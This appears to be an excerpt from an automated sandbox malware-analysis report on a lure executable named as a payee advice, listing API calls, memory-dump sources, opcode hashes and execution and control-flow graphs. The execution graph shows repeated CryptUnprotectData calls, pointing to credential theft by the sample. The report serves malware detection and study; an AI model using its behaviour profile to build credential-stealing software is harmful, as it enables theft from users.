                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                          • API String ID: 1100898210-823278215
                                                                                                                                          • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                          • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                                          • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                          • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405987
                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405997
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                          • API String ID: 2709904686-1246513382
                                                                                                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                          • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                          • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                            • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$Alloclstrcpy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 852173138-0
                                                                                                                                          • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                          • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                                          • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                          • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                                                          APIs
                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                          • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                          • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                          • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                          • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                          • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:7.8%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:11.8%
                                                                                                                                          Total number of Nodes:93
                                                                                                                                          Total number of Limit Nodes:8
                                                                                                                                          execution_graph 70053 3b0065b0 70054 3b006618 CreateWindowExW 70053->70054 70056 3b0066d4 70054->70056 70056->70056 69959 3a99b438 69960 3a99b47e GetCurrentProcess 69959->69960 69962 3a99b4c9 69960->69962 69963 3a99b4d0 GetCurrentThread 69960->69963 69962->69963 69964 3a99b50d GetCurrentProcess 69963->69964 69965 3a99b506 69963->69965 69966 3a99b543 69964->69966 69965->69964 69967 3a99b56b GetCurrentThreadId 69966->69967 69968 3a99b59c 69967->69968 69969 3b008cc2 69970 3b008cd2 69969->69970 69971 3b008d32 69970->69971 69972 3b008ddc 69970->69972 69973 3b008d8a CallWindowProcW 69971->69973 69975 3b008d39 69971->69975 69976 3b003b8c 69972->69976 69973->69975 69977 3b003b97 69976->69977 69979 3b007519 69977->69979 69980 3b003cb4 CallWindowProcW 69977->69980 69980->69979 70057 3b00aeb8 70058 3b00b1c0 70057->70058 70059 3b00aee0 70057->70059 70060 3b00aee9 70059->70060 70063 3b00a384 70059->70063 70062 3b00af0c 70065 3b00a38f 70063->70065 70064 3b00b203 70064->70062 70065->70064 70067 3b00a3a0 70065->70067 70068 3b00b238 OleInitialize 70067->70068 70069 3b00b29c 70068->70069 70069->70064 70070 3a99b680 DuplicateHandle 70071 3a99b716 70070->70071 69981 16e018 69982 16e024 69981->69982 69989 3a777b69 69982->69989 69993 3a777b78 69982->69993 69983 16e1d4 69997 3a7e5fc7 69983->69997 70001 3a7e5fd8 69983->70001 69984 16e2e5 69991 3a777b70 69989->69991 69990 3a778029 69990->69983 69991->69990 70005 3a778431 69991->70005 69995 3a777b9a 69993->69995 69994 3a778029 69994->69983 69995->69994 69996 3a778431 CryptUnprotectData 69995->69996 69996->69995 69999 3a7e5fcc 69997->69999 69998 3a7e64c9 69998->69984 69999->69998 70000 3a778431 CryptUnprotectData 69999->70000 70000->69999 70004 3a7e5ffa 70001->70004 70002 3a7e64c9 70002->69984 70003 3a778431 CryptUnprotectData 70003->70004 70004->70002 70004->70003 70006 3a778440 70005->70006 70010 3a778a68 70006->70010 70018 3a778a59 70006->70018 70007 3a7784b0 70007->69991 70011 3a778a8d 70010->70011 70014 3a778b41 70010->70014 70011->70014 70016 3a778a59 CryptUnprotectData 70011->70016 70017 3a778a68 CryptUnprotectData 70011->70017 70026 3a778c4a 70011->70026 70030 3a7787a8 70014->70030 70016->70014 70017->70014 70019 3a778a5c 70018->70019 70022 3a778b41 70019->70022 70023 3a778c4a CryptUnprotectData 70019->70023 70024 3a778a59 CryptUnprotectData 70019->70024 70025 3a778a68 CryptUnprotectData 70019->70025 70020 3a7787a8 CryptUnprotectData 70021 3a778d0d 70020->70021 70021->70007 70022->70020 70023->70022 70024->70022 70025->70022 70027 3a778c5d 70026->70027 70028 3a7787a8 CryptUnprotectData 70027->70028 70029 3a778d0d 70028->70029 70029->70014 70031 3a778ef8 CryptUnprotectData 70030->70031 70032 3a778d0d 70031->70032 70032->70007 70033 ad044 70034 ad05c 70033->70034 70035 ad0b6 70034->70035 70039 3b003b8c CallWindowProcW 70034->70039 70040 3b006768 70034->70040 70044 3b006759 70034->70044 70048 3b0074b8 70034->70048 70039->70035 70041 3b00678e 70040->70041 70042 3b003b8c CallWindowProcW 70041->70042 70043 3b0067af 70042->70043 70043->70035 70045 3b00678e 70044->70045 70046 3b003b8c CallWindowProcW 70045->70046 70047 3b0067af 70046->70047 70047->70035 70050 3b0074f5 70048->70050 70051 3b007519 70050->70051 70052 3b003cb4 CallWindowProcW 70050->70052 70052->70051
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: >o9$>o9$>o9$N
                                                                                                                                          • API String ID: 0-1948691326
                                                                                                                                          • Opcode ID: 6097843ee863970c5d35e2dc29a73525e45e226bf976b0a87ea7487bd6bd383b
                                                                                                                                          • Instruction ID: a30ce76fe5b873ec483a5a80c390a20895b715523c54cc3959466c5fe7cc09c1
                                                                                                                                          • Opcode Fuzzy Hash: 6097843ee863970c5d35e2dc29a73525e45e226bf976b0a87ea7487bd6bd383b
                                                                                                                                          • Instruction Fuzzy Hash: 6373F731C1075A8EDB10EF68C854AADF7B1FF99300F51D69AE44967221EB70AAD4CF81
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (o]q$4']q$4']q$4']q
                                                                                                                                          • API String ID: 0-875651895
                                                                                                                                          • Opcode ID: c03625e0c08be1bf960dd3d68dd1d227d46f78f4db18ddb1d43462b682d17f18
                                                                                                                                          • Instruction ID: 71ed45cf23857632f74839e09c9ddf7c516ae63be1f4d2b0ebd1f50599e02208
                                                                                                                                          • Opcode Fuzzy Hash: c03625e0c08be1bf960dd3d68dd1d227d46f78f4db18ddb1d43462b682d17f18
                                                                                                                                          • Instruction Fuzzy Hash: D6A28071600209CFCB15CFA8C994AAEBBF2BF89310F55855AE405EB261D731ED91CF52

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1804 166fc8-166ffe 1937 167000 call 166fc8 1804->1937 1938 167000 call 167118 1804->1938 1805 167006-16700c 1806 16700e-167012 1805->1806 1807 16705c-167060 1805->1807 1810 167014-167019 1806->1810 1811 167021-167028 1806->1811 1808 167077-16708b 1807->1808 1809 167062-167071 1807->1809 1939 16708d call 169de0 1808->1939 1940 16708d call 16a0e8 1808->1940 1814 167073-167075 1809->1814 1815 16709d-1670a7 1809->1815 1810->1811 1812 1670fe-16713b 1811->1812 1813 16702e-167035 1811->1813 1825 167146-167166 1812->1825 1826 16713d-167143 1812->1826 1813->1807 1816 167037-16703b 1813->1816 1817 167093-16709a 1814->1817 1818 1670b1-1670b5 1815->1818 1819 1670a9-1670af 1815->1819 1823 16703d-167042 1816->1823 1824 16704a-167051 1816->1824 1821 1670bd-1670f7 1818->1821 1822 1670b7 1818->1822 1819->1821 1821->1812 1822->1821 1823->1824 1824->1812 1827 167057-16705a 1824->1827 1832 16716d-167174 1825->1832 1833 167168 1825->1833 1826->1825 1827->1817 1836 167176-167181 1832->1836 1835 1674fc-167505 1833->1835 1837 167187-16719a 1836->1837 1838 16750d-167519 1836->1838 1843 1671b0-1671cb 1837->1843 1844 16719c-1671aa 1837->1844 1845 167531-167536 1838->1845 1846 16751b-167521 1838->1846 1852 1671ef-1671f2 1843->1852 1853 1671cd-1671d3 1843->1853 1844->1843 1851 167484-16748b 1844->1851 1847 167523-16752f 1846->1847 1848 167539-167549 1846->1848 1847->1845 1860 167552-167556 1848->1860 1861 16754b-167550 1848->1861 1851->1835 1857 16748d-16748f 1851->1857 1858 16734c-167352 1852->1858 1859 1671f8-1671fb 1852->1859 1855 1671d5 1853->1855 1856 1671dc-1671df 1853->1856 1855->1856 1855->1858 1862 167212-167218 1855->1862 1863 16743e-167441 1855->1863 1856->1862 1864 1671e1-1671e4 1856->1864 1865 167491-167496 1857->1865 1866 16749e-1674a4 1857->1866 1858->1863 1867 167358-16735d 1858->1867 1859->1858 1868 167201-167207 1859->1868 1869 16755c-16755d 1860->1869 1861->1869 1874 16721e-167220 1862->1874 1875 16721a-16721c 1862->1875 1876 167447-16744d 1863->1876 1877 167508 1863->1877 1870 16727e-167284 1864->1870 1871 1671ea 1864->1871 1865->1866 1866->1838 1872 1674a6-1674ab 1866->1872 1867->1863 1868->1858 1873 16720d 1868->1873 1870->1863 1880 16728a-167290 1870->1880 1871->1863 1878 1674f0-1674f3 1872->1878 1879 1674ad-1674b2 1872->1879 1873->1863 1881 16722a-167233 1874->1881 1875->1881 1882 167472-167476 1876->1882 1883 16744f-167457 1876->1883 1877->1838 1878->1877 1887 1674f5-1674fa 1878->1887 1879->1877 1888 1674b4 1879->1888 1889 167296-167298 1880->1889 1890 167292-167294 1880->1890 1884 167246-16726e 1881->1884 1885 167235-167240 1881->1885 1882->1851 1886 167478-16747e 1882->1886 1883->1838 1891 16745d-16746c 1883->1891 1911 167274-167279 1884->1911 1912 167362-167398 1884->1912 1885->1863 1885->1884 1886->1836 1886->1851 1887->1835 1887->1857 1892 1674bb-1674c0 1888->1892 1893 1672a2-1672b9 1889->1893 1890->1893 1891->1843 1891->1882 1897 1674e2-1674e4 1892->1897 1898 1674c2-1674c4 1892->1898 1904 1672e4-16730b 1893->1904 1905 1672bb-1672d4 1893->1905 1897->1877 1900 1674e6-1674e9 1897->1900 1901 1674c6-1674cb 1898->1901 1902 1674d3-1674d9 1898->1902 1900->1878 1901->1902 1902->1838 1903 1674db-1674e0 1902->1903 1903->1897 1907 1674b6-1674b9 1903->1907 1904->1877 1917 167311-167314 1904->1917 1905->1912 1915 1672da-1672df 1905->1915 1907->1877 1907->1892 1911->1912 1919 1673a5-1673ad 1912->1919 1920 16739a-16739e 1912->1920 1915->1912 1917->1877 1918 16731a-167343 1917->1918 1918->1912 1935 167345-16734a 1918->1935 1919->1877 1921 1673b3-1673b8 1919->1921 1922 1673a0-1673a3 1920->1922 1923 1673bd-1673c1 1920->1923 1921->1863 1922->1919 1922->1923 1925 1673c3-1673c9 1923->1925 1926 1673e0-1673e4 1923->1926 1925->1926 1927 1673cb-1673d3 1925->1927 1928 1673e6-1673ec 1926->1928 1929 1673ee-16740d call 1676f1 1926->1929 1927->1877 1931 1673d9-1673de 1927->1931 1928->1929 1932 167413-167417 1928->1932 1929->1932 1931->1863 1932->1863 1933 167419-167435 1932->1933 1933->1863 1935->1912 1937->1805 1938->1805 1939->1817 1940->1817
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (o]q$(o]q$,aq$,aq
                                                                                                                                          • API String ID: 0-1947289240
                                                                                                                                          • Opcode ID: 4e2b611bb2ebb5798dfc2cd6c9364c63d71ef80291efa6dd50a1f684cfca0e0c
                                                                                                                                          • Instruction ID: 9ad1432be97aed72d0b808e4be7ff9e5c29a631de81c39489cad2bc5e742548d
                                                                                                                                          • Opcode Fuzzy Hash: 4e2b611bb2ebb5798dfc2cd6c9364c63d71ef80291efa6dd50a1f684cfca0e0c
                                                                                                                                          • Instruction Fuzzy Hash: 82025F70A08219DFCB15CF69CC94AADBBF2BF49308F65806AE815AB3A1D730DD51CB51
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: 6ea71aa535f0e87d2a83d1de42580a0585352834984d2a123cc71270a039ac73
                                                                                                                                          • Instruction ID: f84d5c67b8b195264ed4893a3d98456f5949235331de640e94b1c5d6c3a956d4
                                                                                                                                          • Opcode Fuzzy Hash: 6ea71aa535f0e87d2a83d1de42580a0585352834984d2a123cc71270a039ac73
                                                                                                                                          • Instruction Fuzzy Hash: 37A1D874E01258CFDB18DFA9D894AADBBF2BF89300F15806AE459AB365DB309D41CF50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: c2fc7add6f5994b34163ccb892f621d5f0d04eb1cda2bb6781eb32618057c157
                                                                                                                                          • Instruction ID: adb9e90165ed1e16796fd04ad2b8e7582e6fe868a43f070a4a790476a1395a21
                                                                                                                                          • Opcode Fuzzy Hash: c2fc7add6f5994b34163ccb892f621d5f0d04eb1cda2bb6781eb32618057c157
                                                                                                                                          • Instruction Fuzzy Hash: 9691E974E00658CFDB18DFA9D884A9DBBF2BF89300F15C0AAE459AB365DB309945CF50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: fef3930c37e03e846a9737132fee560f85b271d22760758598a12ef7fb8a9f05
                                                                                                                                          • Instruction ID: 14d127db6f869efbee5be826b3c3c9902a1f533d02bf61ec593c93b0a9e02edf
                                                                                                                                          • Opcode Fuzzy Hash: fef3930c37e03e846a9737132fee560f85b271d22760758598a12ef7fb8a9f05
                                                                                                                                          • Instruction Fuzzy Hash: C491E774E00258CFDB18DFA9D884AADBBF2BF89300F24D16AE459AB365DB305941CF50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: b114f74619f214094ed6ff7a61bb2a91875ec230f8e030d6f0739816687a060d
                                                                                                                                          • Instruction ID: da1cad7a9e34e9d70b2e838764fac19a4095145abf78ddd83c9a455960b6becd
                                                                                                                                          • Opcode Fuzzy Hash: b114f74619f214094ed6ff7a61bb2a91875ec230f8e030d6f0739816687a060d
                                                                                                                                          • Instruction Fuzzy Hash: 0981B3B4E00258CFDB18DFAAD884A9DBBF2BF89300F148069E459AB365DB349945CF51
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: 70ff244097895fc5b376e654968cda1eb68cc739495ecf8c174179aafcb32457
                                                                                                                                          • Instruction ID: 24136ee3df2b8c7586584beb93b4360ba6556e8518f35a7d2003e4d42f7e09de
                                                                                                                                          • Opcode Fuzzy Hash: 70ff244097895fc5b376e654968cda1eb68cc739495ecf8c174179aafcb32457
                                                                                                                                          • Instruction Fuzzy Hash: EC81B474E01258CFDB18DFAAD894AADBBF2BF89300F14C069E459AB365DB349941CF50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: e17571fd62dfae5777063000a33494449ea5ad28823effe962674868d24bb54a
                                                                                                                                          • Instruction ID: 42fc8a3ee2af445a4ac93317a1993226f0f9a3e7e98420a981b2c9fee40c8c1f
                                                                                                                                          • Opcode Fuzzy Hash: e17571fd62dfae5777063000a33494449ea5ad28823effe962674868d24bb54a
                                                                                                                                          • Instruction Fuzzy Hash: D581B574E00218CFDB18DFAAD984AADBBF2BF89304F14D069E459AB365DB349941CF50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: 214a39e4baf1312090365d453b49d556aec37a64297f35e53489b5bd5ec637f1
                                                                                                                                          • Instruction ID: 7c5b2083e2825df971f75efda8aea14121f40bf2771090662629fd7ed5346457
                                                                                                                                          • Opcode Fuzzy Hash: 214a39e4baf1312090365d453b49d556aec37a64297f35e53489b5bd5ec637f1
                                                                                                                                          • Instruction Fuzzy Hash: F281B474E00258CFDB18DFAAC884AADBBF2BF89300F14C069E459AB365DB359945CF50
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PH]q$PH]q
                                                                                                                                          • API String ID: 0-1166926398
                                                                                                                                          • Opcode ID: 899f61d5ca5188c0a05b59693778efb06d6413dfbe168eef86d2c8802b0cd184
                                                                                                                                          • Instruction ID: f588dbbdc0263344d0aa32b47f76be532446850bc345df1ab9ec28009e11adaf
                                                                                                                                          • Opcode Fuzzy Hash: 899f61d5ca5188c0a05b59693778efb06d6413dfbe168eef86d2c8802b0cd184
                                                                                                                                          • Instruction Fuzzy Hash: B481C874E00258CFDB18DFA9D884A9DBBF2BF89300F14C069E419AB365DB749985CF51
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: PEY7
                                                                                                                                          • API String ID: 0-1339874439
                                                                                                                                          • Opcode ID: 65a94bebb3a5dd69bc022cd33878575f727232e77f9403086c89c3f3cefec103
                                                                                                                                          • Instruction ID: 58483b1bf80c7e23a32b42b7f8b0094978b42bd5c9b8872c21b46fb1bf1f3128
